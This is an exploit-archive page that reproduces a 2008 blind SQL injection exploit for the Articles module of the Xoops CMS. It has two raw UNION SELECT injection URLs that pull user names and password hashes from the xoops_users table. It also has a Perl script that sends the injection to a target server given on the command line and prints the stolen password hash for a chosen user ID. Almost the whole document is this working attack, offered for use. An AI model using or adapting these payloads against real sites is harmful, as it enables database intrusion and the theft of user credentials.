Advertisement




Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2008050045

Below is a copy:

/[email protected]_King / http://coderx.org

Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

Sql 1-2

article.php?id=3+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(USER()
,0x71),0x71),8,9,0,1,2,3,4,5,6,7,8,9,0/*

article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pas
s,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FR
OM/**/xoops_users/**/LIMIT/**/1,1/*

# Exploit :

#############################################

#Coded By [email protected]_King      http://coderx.org]#

#############################################

use IO::Socket;

if (@ARGV != 3)

{

print "n-----------------------------------n";

print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0itn";

print "-----------------------------------n";

print "n4ever Cran";

print "crazy_kinq[at]hotmail.co.ukn";

print "http://coderx.orgn";

print "n-----------------------------------n";

print "nKullanim: $0 <server> <path> <uid>n";

print "Ornek: $0 www.victim.com /path 1n";

print "n-----------------------------------n";

exit ();

}

$server = $ARGV[0];

$path = $ARGV[1];

$uid = $ARGV[2];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort =>

"80");

printf $socket ("GET

%s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NUL
L,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0nHost: %snAccept: */*nConnection:

closenn",

$path,$server,$uid);

while(<$socket>)

{

if (/>(w{32})</) { print "nID '$uid' User Password :nn$1n"; }

}

# [email protected]_King

# http://coderx.org

# crazy_kinq (at) hotmail.co (dot) uk [email concealed]


Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.